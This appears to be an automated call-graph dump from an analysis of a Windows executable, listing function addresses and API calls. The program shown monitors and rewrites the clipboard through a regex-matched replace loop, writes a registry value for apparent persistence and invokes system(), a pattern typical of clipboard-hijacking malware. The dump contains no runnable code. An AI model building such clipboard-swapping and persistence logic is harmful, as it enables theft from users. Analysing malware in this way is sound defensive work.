??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA 5635 7ff62b645e5c 5636 7ff62b645e6d 5635->5636 5637 7ff62b645e92 5635->5637 5636->5637 5638 7ff62b645eae _invalid_parameter_noinfo_noreturn 5636->5638 5639 7ff62b645ec9 5638->5639 5640 7ff62b645ef2 5638->5640 5639->5640 5641 7ff62b645f0e _invalid_parameter_noinfo_noreturn 5639->5641 5642 7ff62b648d64 5645 7ff62b649b84 5642->5645 5646 7ff62b64cc88 std::_Facet_Register malloc 5645->5646 5647 7ff62b649b9d 5646->5647 4669 7ff62b64d160 4670 7ff62b64d174 __scrt_initialize_crt 4669->4670 4671 7ff62b64d2ac 4670->4671 4672 7ff62b64d17c __scrt_acquire_startup_lock 4670->4672 4817 7ff62b64d4fc IsProcessorFeaturePresent 4671->4817 4674 7ff62b64d2b6 4672->4674 4675 7ff62b64d19a __scrt_release_startup_lock 4672->4675 4676 7ff62b64d4fc 9 API calls 4674->4676 4679 7ff62b64d1bf 4675->4679 4680 7ff62b64d245 4675->4680 4683 7ff62b64d23d _register_thread_local_exe_atexit_callback 4675->4683 4677 7ff62b64d2c1 4676->4677 4678 7ff62b64d2c9 _exit 4677->4678 4691 7ff62b64d648 memset GetStartupInfoW 4680->4691 4682 7ff62b64d24a _get_wide_winmain_command_line 4692 7ff62b64b900 4682->4692 4683->4680 4688 7ff62b64d271 4689 7ff62b64d27b 4688->4689 4690 7ff62b64d276 _cexit 4688->4690 4689->4679 4690->4689 4691->4682 4693 7ff62b64b956 OpenMutexA 4692->4693 4695 7ff62b64b989 _dupenv_s 4693->4695 4696 7ff62b64b982 4693->4696 4695->4696 4697 7ff62b64b9b2 4695->4697 4963 7ff62b64d030 4696->4963 4697->4696 4823 7ff62b641d68 4697->4823 4704 7ff62b64ba49 free 4706 7ff62b64ba6e 4704->4706 4705 7ff62b64ba44 4705->4704 4843 7ff62b6423e8 4706->4843 4707 7ff62b64ba3d _invalid_parameter_noinfo_noreturn 4707->4705 4713 7ff62b64baf3 4878 7ff62b64a294 4713->4878 4715 7ff62b64baff GetModuleFileNameA 4882 7ff62b6423a4 4715->4882 4717 7ff62b64bb2a 4718 7ff62b64c540 4717->4718 4886 7ff62b645284 4717->4886 4719 7ff62b64a294 _invalid_parameter_noinfo_noreturn 4718->4719 4721 7ff62b64c54c 4719->4721 4725 7ff62b64c584 _invalid_parameter_noinfo_noreturn 4721->4725 4726 7ff62b64c58b 4721->4726 4722 7ff62b64a294 _invalid_parameter_noinfo_noreturn 4724 7ff62b64c5b4 CreateMutexExA 4722->4724 4723 7ff62b64bb89 4889 7ff62b6418c8 4723->4889 4730 7ff62b64c5f0 SleepEx GetClipboardSequenceNumber 4724->4730 4725->4726 4726->4722 4730->4730 4732 7ff62b64c609 OpenClipboard 4730->4732 4731 7ff62b6418c8 7 API calls 4733 7ff62b64bc45 4731->4733 4732->4730 4752 7ff62b64c615 4732->4752 4901 7ff62b6424ac 4733->4901 4738 7ff62b64670c GetClipboardSequenceNumber CloseClipboard 4738->4752 4740 7ff62b6418c8 7 API calls 4742 7ff62b64bcaf 4740->4742 4743 7ff62b6424ac 32 API calls 4742->4743 4744 7ff62b64bcfb 4743->4744 4746 7ff62b6418b4 7 API calls 4744->4746 4748 7ff62b64bd0a 4746->4748 4749 7ff62b6418c8 7 API calls 4748->4749 4750 7ff62b64bd19 4749->4750 4755 7ff62b6418c8 7 API calls 4750->4755 4751 7ff62b64c709 memmove 4751->4752 4752->4730 4752->4738 4752->4751 4753 7ff62b64c885 _invalid_parameter_noinfo_noreturn 4752->4753 4756 7ff62b64c87e _invalid_parameter_noinfo_noreturn 4752->4756 4757 7ff62b64c7a7 GlobalAlloc 4752->4757 4927 7ff62b646670 GetClipboardData 4752->4927 4934 7ff62b641e44 4752->4934 4948 7ff62b6449b0 4752->4948 4952 7ff62b641a34 4752->4952 4956 7ff62b64630c 4752->4956 4753->4696 4758 7ff62b64bd6c 4755->4758 4756->4753 4757->4752 4759 7ff62b64c7c1 memmove EmptyClipboard SetClipboardData 4757->4759 4760 7ff62b6424ac 32 API calls 4758->4760 4759->4752 4761 7ff62b64bdb8 4760->4761 4762 7ff62b6418b4 7 API calls 4761->4762 4763 7ff62b64bdc7 4762->4763 4764 7ff62b6418c8 7 API calls 4763->4764 4765 7ff62b64bdd6 4764->4765 4766 7ff62b6418c8 7 API calls 4765->4766 4767 7ff62b64be14 4766->4767 4768 7ff62b6424ac 32 API calls 4767->4768 4769 7ff62b64be60 4768->4769 4770 7ff62b6418b4 7 API calls 4769->4770 4771 7ff62b64be6f 4770->4771 4772 7ff62b6418c8 7 API calls 4771->4772 4773 7ff62b64bedc 4772->4773 4774 7ff62b6418c8 7 API calls 4773->4774 4775 7ff62b64bf27 4774->4775 4776 7ff62b6424ac 32 API calls 4775->4776 4777 7ff62b64bf73 4776->4777 4778 7ff62b6418b4 7 API calls 4777->4778 4779 7ff62b64bf82 4778->4779 4780 7ff62b6418c8 7 API calls 4779->4780 4781 7ff62b64bf91 4780->4781 4782 7ff62b6418c8 7 API calls 4781->4782 4783 7ff62b64bfd8 4782->4783 4784 7ff62b6424ac 32 API calls 4783->4784 4785 7ff62b64c024 4784->4785 4786 7ff62b6418b4 7 API calls 4785->4786 4787 7ff62b64c033 4786->4787 4788 7ff62b6418c8 7 API calls 4787->4788 4789 7ff62b64c072 4788->4789 4790 7ff62b6418c8 7 API calls 4789->4790 4792 7ff62b64c081 4790->4792 4791 7ff62b64c24f _invalid_parameter_noinfo_noreturn 4793 7ff62b64c256 4791->4793 4792->4791 4792->4793 4793->4793 4794 7ff62b64c2c8 RegCreateKeyA 4793->4794 4795 7ff62b6424ac 32 API calls 4794->4795 4796 7ff62b64c331 4795->4796 4797 7ff62b6424ac 32 API calls 4796->4797 4798 7ff62b64c382 RegSetValueExA 4797->4798 4799 7ff62b64c3c7 4798->4799 4800 7ff62b64c443 4799->4800 4802 7ff62b64c43c _invalid_parameter_noinfo_noreturn 4799->4802 4918 7ff62b64b754 4800->4918 4802->4800 4804 7ff62b64c482 4805 7ff62b64c4af 4804->4805 4807 7ff62b64c4a8 _invalid_parameter_noinfo_noreturn 4804->4807 4924 7ff62b645d28 4805->4924 4807->4805 4815 7ff62b64d690 GetModuleHandleW 4816 7ff62b64d26d 4815->4816 4816->4677 4816->4688 4818 7ff62b64d522 4817->4818 4819 7ff62b64d530 memset RtlCaptureContext RtlLookupFunctionEntry 4818->4819 4820 7ff62b64d56a RtlVirtualUnwind 4819->4820 4821 7ff62b64d5a6 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4819->4821 4820->4821 4822 7ff62b64d62a 4821->4822 4822->4674 4824 7ff62b641d9d 4823->4824 4825 7ff62b641e3c 4823->4825 4827 7ff62b641db6 4824->4827 4828 7ff62b641dab memmove 4824->4828 4984 7ff62b64a580 ?_Xlength_error@std@@YAXPEBD 4825->4984 4831 7ff62b641dc2 4827->4831 4832 7ff62b641df4 4827->4832 4830 7ff62b641e21 4828->4830 4839 7ff62b64242c 4830->4839 4972 7ff62b641a70 4831->4972 4834 7ff62b641df9 4832->4834 4835 7ff62b641def memmove 4832->4835 4979 7ff62b64cc88 4834->4979 4835->4830 4840 7ff62b642446 4839->4840 4985 7ff62b642470 4840->4985 4844 7ff62b642402 4843->4844 4845 7ff62b642470 28 API calls 4844->4845 4846 7ff62b64241b 4845->4846 4847 7ff62b641f10 4846->4847 4848 7ff62b641f40 4847->4848 4856 7ff62b641fef Concurrency::cancel_current_task 4847->4856 4849 7ff62b641f5f 4848->4849 4850 7ff62b641f4e memmove 4848->4850 4853 7ff62b641f6b 4849->4853 4855 7ff62b641f9d 4849->4855 4849->4856 4852 7ff62b641fda 4850->4852 4863 7ff62b6460cc 4852->4863 4858 7ff62b641a70 2 API calls 4853->4858 4855->4853 4857 7ff62b641fb0 4855->4857 5076 7ff62b64a580 ?_Xlength_error@std@@YAXPEBD 4856->5076 4859 7ff62b641fb7 4857->4859 4860 7ff62b641fbc memmove 4857->4860 4861 7ff62b641fae 4858->4861 4862 7ff62b64cc88 std::_Facet_Register malloc 4859->4862 4860->4852 4861->4860 4862->4860 4867 7ff62b6460f6 4863->4867 4864 7ff62b646193 4865 7ff62b6461b5 4864->4865 5077 7ff62b64a7a4 4864->5077 4865->4713 4867->4864 4868 7ff62b6461ba 4867->4868 4869 7ff62b6461d5 4868->4869 4870 7ff62b6461fa 4868->4870 4871 7ff62b6461e2 4869->4871 4874 7ff62b64627f 4869->4874 4870->4871 5083 7ff62b643620 4870->5083 5099 7ff62b64a6b0 4871->5099 4875 7ff62b645d28 3 API calls 4874->4875 4876 7ff62b6463f4 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 4875->4876 4877 7ff62b646403 4876->4877 4877->4713 4879 7ff62b64a2a7 4878->4879 4881 7ff62b64a2d0 4878->4881 4880 7ff62b64a2ef _invalid_parameter_noinfo_noreturn 4879->4880 4879->4881 4881->4715 4883 7ff62b6423be 4882->4883 4884 7ff62b642470 28 API calls 4883->4884 4885 7ff62b6423d7 4884->4885 4885->4717 4887 7ff62b6452ca ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 4886->4887 4888 7ff62b64529f ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA 4886->4888 4887->4723 4888->4887 4890 7ff62b6418f0 4889->4890 5138 7ff62b64564c 4890->5138 4892 7ff62b64192b ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 4897 7ff62b641a00 4892->4897 4898 7ff62b6419f4 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 4892->4898 4893 7ff62b641923 4893->4892 4895 7ff62b641974 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 4893->4895 4899 7ff62b64194f ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 4893->4899 4895->4892 4896 7ff62b641991 4895->4896 4896->4892 4900 7ff62b641996 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 4896->4900 4897->4731 4898->4897 4899->4892 4899->4893 4900->4892 4900->4896 4902 7ff62b64c9dc __std_fs_code_page 2 API calls 4901->4902 4903 7ff62b6424c9 4902->4903 5142 7ff62b6424f8 4903->5142 4906 7ff62b6418b4 4907 7ff62b6418b9 4906->4907 4908 7ff62b64564c ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 4907->4908 4916 7ff62b642e81 4908->4916 4909 7ff62b642ed6 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 4912 7ff62b642e89 4909->4912 4913 7ff62b642ec8 4909->4913 4910 7ff62b642f37 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 4914 7ff62b642f56 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 4910->4914 4915 7ff62b642f62 4910->4915 4911 7ff62b642ead ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 4911->4913 4911->4916 4912->4910 4913->4910 4913->4912 4917 7ff62b642ef8 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 4913->4917 4914->4915 4915->4740 4916->4909 4916->4911 4916->4912 4917->4912 4917->4913 4920 7ff62b64b796 4918->4920 4919 7ff62b64b7ce system 4919->4804 4919->4805 4920->4919 4921 7ff62b64b7c3 4920->4921 4922 7ff62b64b7ae memmove 4920->4922 5178 7ff62b643388 4921->5178 4922->4919 5193 7ff62b64a0c0 4924->5193 4926 7ff62b645d7f ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA 4928 7ff62b64669d 4927->4928 4929 7ff62b6466f2 4927->4929 4931 7ff62b641d68 5 API calls 4928->4931 4930 7ff62b64d030 8 API calls 4929->4930 4932 7ff62b646706 4930->4932 4933 7ff62b6466c9 memmove 4931->4933 4932->4752 4933->4929 4935 7ff62b641f08 4934->4935 4936 7ff62b641e74 4934->4936 5197 7ff62b64a580 ?_Xlength_error@std@@YAXPEBD 4935->5197 4938 7ff62b641e87 memmove 4936->4938 4939 7ff62b641e92 4936->4939 4940 7ff62b641ef3 4938->4940 4941 7ff62b641e9e 4939->4941 4943 7ff62b641ecd 4939->4943 4940->4752 4944 7ff62b641a70 2 API calls 4941->4944 4945 7ff62b641ed9 memmove 4943->4945 4947 7ff62b64cc88 std::_Facet_Register malloc 4943->4947 4946 7ff62b641ecb 4944->4946 4945->4940 4946->4945 4947->4945 4949 7ff62b6449ec 4948->4949 5198 7ff62b64496c 4949->5198 4953 7ff62b641a43 4952->4953 4954 7ff62b641a59 memcmp 4953->4954 4955 7ff62b641a64 4953->4955 4954->4955 4955->4752 4957 7ff62b646325 4956->4957 4958 7ff62b646349 4956->4958 4957->4958 4959 7ff62b646382 _invalid_parameter_noinfo_noreturn 4957->4959 4958->4752 4960 7ff62b64a0c0 _invalid_parameter_noinfo_noreturn 4959->4960 4961 7ff62b6463aa ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 4960->4961 4962 7ff62b6463b8 4961->4962 4962->4752 4964 7ff62b64d039 4963->4964 4965 7ff62b64c89e 4964->4965 4966 7ff62b64d784 IsProcessorFeaturePresent 4964->4966 4965->4815 4967 7ff62b64d79c 4966->4967 5548 7ff62b64d858 RtlCaptureContext 4967->5548 4973 7ff62b641a7d 4972->4973 4974 7ff62b641aa5 Concurrency::cancel_current_task 4972->4974 4975 7ff62b64cc88 std::_Facet_Register malloc 4973->4975 4976 7ff62b641a85 4975->4976 4977 7ff62b641a8d 4976->4977 4978 7ff62b641a9e _invalid_parameter_noinfo_noreturn 4976->4978 4977->4835 4978->4974 4980 7ff62b64cca2 malloc 4979->4980 4981 7ff62b641dfe 4980->4981 4982 7ff62b64cc93 4980->4982 4981->4835 4982->4980 4983 7ff62b64ccb2 Concurrency::cancel_current_task 4982->4983 4990 7ff62b64c9dc ___lc_codepage_func 4985->4990 4991 7ff62b642485 4990->4991 4992 7ff62b64c9ef AreFileApisANSI 4990->4992 4993 7ff62b648198 4991->4993 4992->4991 4994 7ff62b64245f 4993->4994 4995 7ff62b6481e8 4993->4995 4994->4704 4994->4705 4994->4707 4996 7ff62b64829b 4995->4996 5008 7ff62b64ca04 MultiByteToWideChar 4995->5008 5019 7ff62b64a008 4996->5019 4999 7ff62b6482a6 5001 7ff62b64a044 24 API calls 4999->5001 5002 7ff62b6482ae 5001->5002 5004 7ff62b64822a 5005 7ff62b64ca04 __std_fs_convert_narrow_to_wide 2 API calls 5004->5005 5006 7ff62b648270 5005->5006 5006->4994 5015 7ff62b64a044 5006->5015 5009 7ff62b648212 5008->5009 5010 7ff62b64ca2e GetLastError 5008->5010 5009->4999 5009->5004 5011 7ff62b64a72c 5009->5011 5010->5009 5012 7ff62b64a781 5011->5012 5014 7ff62b64a74d 5011->5014 5022 7ff62b643a24 5012->5022 5014->5004 5016 7ff62b64a054 5015->5016 5027 7ff62b645728 5016->5027 5020 7ff62b64a018 5019->5020 5021 7ff62b645728 23 API calls 5020->5021 5023 7ff62b643ba6 5022->5023 5026 7ff62b64a580 ?_Xlength_error@std@@YAXPEBD 5023->5026 5028 7ff62b645776 5027->5028 5035 7ff62b645388 5028->5035 5031 7ff62b6457ce 5032 7ff62b64d030 8 API calls 5031->5032 5034 7ff62b6457ed _CxxThrowException 5032->5034 5033 7ff62b6457c7 _invalid_parameter_noinfo_noreturn 5033->5031 5036 7ff62b6453cd 5035->5036 5037 7ff62b641e44 5 API calls 5036->5037 5038 7ff62b6453dc 5037->5038 5047 7ff62b649524 5038->5047 5042 7ff62b645438 5043 7ff62b645467 5042->5043 5045 7ff62b645460 _invalid_parameter_noinfo_noreturn 5042->5045 5044 7ff62b64d030 8 API calls 5043->5044 5046 7ff62b64548d 5044->5046 5045->5043 5046->5031 5046->5033 5048 7ff62b64956a 5047->5048 5049 7ff62b649555 5047->5049 5051 7ff62b64a5bc 8 API calls 5048->5051 5058 7ff62b64a5bc 5049->5058 5053 7ff62b64959b 5051->5053 5052 7ff62b6495dc memmove 5055 7ff62b64d030 8 API calls 5052->5055 5053->5052 5054 7ff62b6495d7 5053->5054 5056 7ff62b6495d0 _invalid_parameter_noinfo_noreturn 5053->5056 5054->5052 5057 7ff62b6453f5 __std_exception_copy 5055->5057 5056->5054 5057->5042 5057->5043 5059 7ff62b64a60b 5058->5059 5061 7ff62b6438cc 5059->5061 5062 7ff62b64390b 5061->5062 5063 7ff62b643a1e 5061->5063 5065 7ff62b64391f 5062->5065 5068 7ff62b643961 5062->5068 5064 7ff62b64a580 ?_Xlength_error@std@@YAXPEBD 5063->5064 5066 7ff62b643a23 5064->5066 5067 7ff62b641a70 _invalid_parameter_noinfo_noreturn malloc 5065->5067 5070 7ff62b64395c 5067->5070 5069 7ff62b64cc88 std::_Facet_Register malloc 5068->5069 5068->5070 5069->5070 5071 7ff62b64398c memmove memmove 5070->5071 5072 7ff62b6439e0 memmove memmove 5070->5072 5073 7ff62b6439b7 5071->5073 5075 7ff62b6439cc 5071->5075 5072->5075 5074 7ff62b6439d9 _invalid_parameter_noinfo_noreturn 5073->5074 5073->5075 5074->5072 5078 7ff62b64a7ea 5077->5078 5079 7ff62b64a7bf memmove 5077->5079 5105 7ff62b643244 5078->5105 5082 7ff62b64a7fd 5079->5082 5082->4865 5084 7ff62b643660 5083->5084 5089 7ff62b64377f Concurrency::cancel_current_task 5083->5089 5086 7ff62b643688 5084->5086 5088 7ff62b6436bd 5084->5088 5084->5089 5090 7ff62b641a70 2 API calls 5086->5090 5088->5086 5091 7ff62b6436d3 5088->5091 5120 7ff62b64a580 ?_Xlength_error@std@@YAXPEBD 5089->5120 5092 7ff62b6436ce 5090->5092 5091->5092 5093 7ff62b64cc88 std::_Facet_Register malloc 5091->5093 5094 7ff62b643749 memmove 5092->5094 5095 7ff62b6436f9 memmove 5092->5095 5093->5092 5096 7ff62b643735 5094->5096 5095->5096 5097 7ff62b643720 5095->5097 5096->4871 5097->5096 5098 7ff62b643742 _invalid_parameter_noinfo_noreturn 5097->5098 5098->5094 5100 7ff62b64a701 5099->5100 5102 7ff62b64a6d5 memmove 5099->5102 5121 7ff62b643494 5100->5121 5104 7ff62b64a719 5102->5104 5104->4865 5109 7ff62b64337a Concurrency::cancel_current_task 5105->5109 5110 7ff62b64327d 5105->5110 5106 7ff62b64329e 5111 7ff62b641a70 2 API calls 5106->5111 5119 7ff62b64a580 ?_Xlength_error@std@@YAXPEBD 5109->5119 5110->5106 5110->5109 5113 7ff62b6432e9 5110->5113 5116 7ff62b6432e4 memmove 5111->5116 5114 7ff62b64cc88 std::_Facet_Register malloc 5113->5114 5113->5116 5114->5116 5115 7ff62b64331d 5117 7ff62b643346 5115->5117 5118 7ff62b643373 _invalid_parameter_noinfo_noreturn 5115->5118 5116->5115 5116->5117 5117->5082 5118->5109 5122 7ff62b643614 Concurrency::cancel_current_task 5121->5122 5123 7ff62b6434d3 5121->5123 5137 7ff62b64a580 ?_Xlength_error@std@@YAXPEBD 5122->5137 5123->5122 5125 7ff62b6434fb 5123->5125 5127 7ff62b643530 5123->5127 5128 7ff62b641a70 2 API calls 5125->5128 5127->5125 5129 7ff62b643546 5127->5129 5130 7ff62b643541 5128->5130 5129->5130 5131 7ff62b64cc88 std::_Facet_Register malloc 5129->5131 5132 7ff62b64357a memmove memmove 5130->5132 5133 7ff62b6435d4 memmove memmove 5130->5133 5131->5130 5134 7ff62b6435ab 5132->5134 5135 7ff62b6435c0 5132->5135 5133->5135 5134->5135 5136 7ff62b6435cd _invalid_parameter_noinfo_noreturn 5134->5136 5135->5104 5136->5133 5139 7ff62b64567c 5138->5139 5140 7ff62b6456b6 5139->5140 5141 7ff62b64569f ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 5139->5141 5140->4893 5141->5140 5143 7ff62b642546 5142->5143 5144 7ff62b6424e4 5142->5144 5156 7ff62b6425ee 5143->5156 5157 7ff62b64ca4c 5143->5157 5144->4906 5146 7ff62b64a008 23 API calls 5148 7ff62b6425f9 5146->5148 5149 7ff62b64a044 24 API calls 5148->5149 5150 7ff62b642601 5149->5150 5152 7ff62b642584 5153 7ff62b64ca4c __std_fs_convert_wide_to_narrow 5 API calls 5152->5153 5154 7ff62b6425c9 5153->5154 5154->5144 5155 7ff62b64a044 24 API calls 5154->5155 5155->5156 5156->5146 5158 7ff62b64caca WideCharToMultiByte 5157->5158 5159 7ff62b64ca73 5157->5159 5161 7ff62b64cafb 5158->5161 5159->5158 5160 7ff62b64ca7b WideCharToMultiByte 5159->5160 5160->5161 5162 7ff62b642570 5160->5162 5163 7ff62b64cb07 5161->5163 5164 7ff62b64caff GetLastError 5161->5164 5162->5148 5162->5152 5167 7ff62b64a634 5162->5167 5163->5162 5165 7ff62b64cb14 WideCharToMultiByte 5163->5165 5164->5163 5165->5162 5166 7ff62b64cb41 GetLastError 5165->5166 5166->5162 5168 7ff62b64a68a 5167->5168 5169 7ff62b64a659 memset 5167->5169 5173 7ff62b643bac 5168->5173 5172 7ff62b64a69d 5169->5172 5172->5152 5174 7ff62b643cff 5173->5174 5177 7ff62b64a580 ?_Xlength_error@std@@YAXPEBD 5174->5177 5179 7ff62b64348c 5178->5179 5180 7ff62b6433bc 5178->5180 5192 7ff62b64a580 ?_Xlength_error@std@@YAXPEBD 5179->5192 5181 7ff62b6433c9 5180->5181 5184 7ff62b64340b 5180->5184 5185 7ff62b641a70 2 API calls 5181->5185 5186 7ff62b643406 memmove 5184->5186 5188 7ff62b64cc88 std::_Facet_Register malloc 5184->5188 5185->5186 5189 7ff62b643439 5186->5189 5190 7ff62b64345e 5186->5190 5188->5186 5189->5190 5191 7ff62b643485 _invalid_parameter_noinfo_noreturn 5189->5191 5190->4919 5191->5179 5194 7ff62b64a0cf 5193->5194 5195 7ff62b64a11d 5193->5195 5194->5195 5196 7ff62b64a162 _invalid_parameter_noinfo_noreturn 5194->5196 5195->4926 5201 7ff62b643d08 5198->5201 5203 7ff62b643f6c 5201->5203 5204 7ff62b643f9d 5203->5204 5205 7ff62b643fa4 5203->5205 5216 7ff62b644e34 5205->5216 5209 7ff62b644078 5242 7ff62b64585c 5209->5242 5212 7ff62b644001 5212->5209 5213 7ff62b644068 5212->5213 5214 7ff62b643060 65 API calls 5212->5214 5232 7ff62b649d64 5212->5232 5215 7ff62b643060 65 API calls 5213->5215 5214->5212 5215->5209 5217 7ff62b644ed5 5216->5217 5247 7ff62b644254 5217->5247 5219 7ff62b643ff0 5220 7ff62b643060 5219->5220 5221 7ff62b643098 5220->5221 5222 7ff62b643086 5220->5222 5275 7ff62b64b420 5221->5275 5271 7ff62b6442d8 5222->5271 5225 7ff62b6430bf 5226 7ff62b644254 7 API calls 5225->5226 5227 7ff62b6430d7 5226->5227 5281 7ff62b649638 5227->5281 5229 7ff62b643114 5230 7ff62b6442d8 5 API calls 5229->5230 5231 7ff62b64313c 5229->5231 5230->5231 5231->5212 5234 7ff62b649d92 5232->5234 5233 7ff62b649de3 5233->5212 5234->5233 5235 7ff62b649f83 5234->5235 5238 7ff62b649ebc 5234->5238 5239 7ff62b649e1b 5234->5239 5235->5233 5541 7ff62b641d40 5235->5541 5237 7ff62b649ecd ?tolower@?$ctype@D@std@@QEBADD 5237->5238 5238->5233 5238->5237 5240 7ff62b64b7e0 9 API calls 5238->5240 5239->5233 5241 7ff62b649d64 11 API calls 5239->5241 5240->5238 5241->5239 5244 7ff62b645871 5242->5244 5243 7ff62b645a1c _invalid_parameter_noinfo_noreturn 5246 7ff62b6458c6 5243->5246 5244->5243 5245 7ff62b6458d3 _invalid_parameter_noinfo_noreturn 5244->5245 5246->5245 5248 7ff62b644289 5247->5248 5250 7ff62b64427c 5247->5250 5248->5250 5251 7ff62b6444d0 5248->5251 5250->5219 5252 7ff62b6445d1 5251->5252 5255 7ff62b6444f9 5251->5255 5270 7ff62b64a594 ?_Xlength_error@std@@YAXPEBD 5252->5270 5254 7ff62b644520 5256 7ff62b641a70 2 API calls 5254->5256 5255->5254 5257 7ff62b644568 5255->5257 5263 7ff62b6445b4 Concurrency::cancel_current_task 5255->5263 5258 7ff62b644557 5256->5258 5257->5258 5259 7ff62b64cc88 std::_Facet_Register malloc 5257->5259 5260 7ff62b64459a memset 5258->5260 5261 7ff62b6445a5 5258->5261 5259->5258 5260->5261 5269 7ff62b6426b8 memmove 5261->5269 5264 7ff62b6478d9 5263->5264 5265 7ff62b64790f _invalid_parameter_noinfo_noreturn 5263->5265 5264->5250 5266 7ff62b647918 5265->5266 5267 7ff62b647989 5266->5267 5268 7ff62b6479c2 _invalid_parameter_noinfo_noreturn 5266->5268 5267->5250 5269->5263 5272 7ff62b64432e 5271->5272 5273 7ff62b644320 5271->5273 5272->5273 5296 7ff62b6445e0 5272->5296 5273->5221 5276 7ff62b64b443 5275->5276 5278 7ff62b64b476 5275->5278 5311 7ff62b6490f4 5276->5311 5277 7ff62b64b474 5277->5225 5278->5277 5316 7ff62b64ad18 5278->5316 5290 7ff62b649667 5281->5290 5282 7ff62b649b6b ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 5283 7ff62b649b55 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 5285 7ff62b649b60 ?_Xregex_error@std@@YAXW4error_type@regex_constants@1@ 5283->5285 5284 7ff62b649b13 5284->5229 5285->5282 5287 7ff62b641d40 11 API calls 5287->5290 5288 7ff62b649638 23 API calls 5288->5290 5290->5282 5290->5283 5290->5284 5290->5285 5290->5287 5290->5288 5295 7ff62b649b4e _invalid_parameter_noinfo_noreturn 5290->5295 5379 7ff62b6420cc 5290->5379 5394 7ff62b641aac 5290->5394 5398 7ff62b648448 5290->5398 5403 7ff62b6487bc 5290->5403 5420 7ff62b646048 5290->5420 5426 7ff62b648aa0 5290->5426 5295->5283 5297 7ff62b64471d 5296->5297 5300 7ff62b644609 5296->5300 5310 7ff62b64a594 ?_Xlength_error@std@@YAXPEBD 5297->5310 5299 7ff62b64465d 5301 7ff62b641a70 2 API calls 5299->5301 5300->5299 5302 7ff62b6446a6 5300->5302 5306 7ff62b644700 Concurrency::cancel_current_task 5300->5306 5303 7ff62b644695 5301->5303 5302->5303 5304 7ff62b64cc88 std::_Facet_Register malloc 5302->5304 5309 7ff62b6426b8 memmove 5303->5309 5304->5303 5307 7ff62b647989 5306->5307 5308 7ff62b6479c2 _invalid_parameter_noinfo_noreturn 5306->5308 5307->5273 5309->5306 5320 7ff62b649248 5311->5320 5313 7ff62b649122 5328 7ff62b642830 5313->5328 5318 7ff62b64ad58 5316->5318 5317 7ff62b64ae85 5317->5277 5318->5317 5341 7ff62b64a444 5318->5341 5321 7ff62b649280 5320->5321 5327 7ff62b6492b5 5320->5327 5322 7ff62b64929a 5321->5322 5323 7ff62b649375 5321->5323 5332 7ff62b6441a8 5322->5332 5339 7ff62b64a56c ?_Xlength_error@std@@YAXPEBD 5323->5339 5327->5313 5329 7ff62b642852 5328->5329 5330 7ff62b64287f 5329->5330 5331 7ff62b6428a4 memset 5329->5331 5330->5277 5331->5330 5333 7ff62b6441e6 5332->5333 5338 7ff62b6441dc 5332->5338 5334 7ff62b6441f8 5333->5334 5335 7ff62b644205 5333->5335 5333->5338 5337 7ff62b644390 9 API calls 5334->5337 5336 7ff62b642f98 memcmp 5335->5336 5336->5338 5337->5338 5338->5327 5340 7ff62b64a580 ?_Xlength_error@std@@YAXPEBD 5339->5340 5342 7ff62b64a4c6 5341->5342 5343 7ff62b64a468 5341->5343 5344 7ff62b64a56c 2 API calls 5342->5344 5345 7ff62b64a497 5343->5345 5358 7ff62b6426b8 memmove 5343->5358 5349 7ff62b64a4cb 5344->5349 5345->5317 5347 7ff62b64a555 5348 7ff62b64a52d 5350 7ff62b64a536 5348->5350 5351 7ff62b64a540 5348->5351 5349->5347 5349->5348 5355 7ff62b64a4fa 5349->5355 5366 7ff62b6488c0 5350->5366 5354 7ff62b64a51d 5351->5354 5370 7ff62b6483d0 5351->5370 5354->5317 5355->5350 5356 7ff62b64a50e 5355->5356 5356->5347 5359 7ff62b64838c 5356->5359 5358->5345 5360 7ff62b6474c0 malloc 5359->5360 5361 7ff62b6483a7 5360->5361 5362 7ff62b6482d4 47 API calls 5361->5362 5363 7ff62b6483b2 5362->5363 5364 7ff62b648ce0 malloc 5363->5364 5365 7ff62b648cd1 5364->5365 5365->5354 5367 7ff62b6488db 5366->5367 5368 7ff62b6482d4 47 API calls 5367->5368 5369 7ff62b6488e6 5368->5369 5371 7ff62b64757c malloc 5370->5371 5372 7ff62b6483f3 5371->5372 5373 7ff62b6482d4 47 API calls 5372->5373 5374 7ff62b6483fe 5373->5374 5375 7ff62b648ce0 malloc 5374->5375 5376 7ff62b64840a 5375->5376 5377 7ff62b64b420 47 API calls 5376->5377 5378 7ff62b64841b 5377->5378 5378->5354 5380 7ff62b642175 5379->5380 5381 7ff62b6420d5 5379->5381 5380->5290 5382 7ff62b642189 5381->5382 5383 7ff62b642104 5381->5383 5455 7ff62b64a594 ?_Xlength_error@std@@YAXPEBD 5382->5455 5385 7ff62b642115 5383->5385 5386 7ff62b642122 5383->5386 5388 7ff62b641a70 2 API calls 5385->5388 5389 7ff62b64cc88 std::_Facet_Register malloc 5386->5389 5390 7ff62b64211d 5386->5390 5388->5390 5389->5390 5447 7ff62b6426b8 memmove 5390->5447 5392 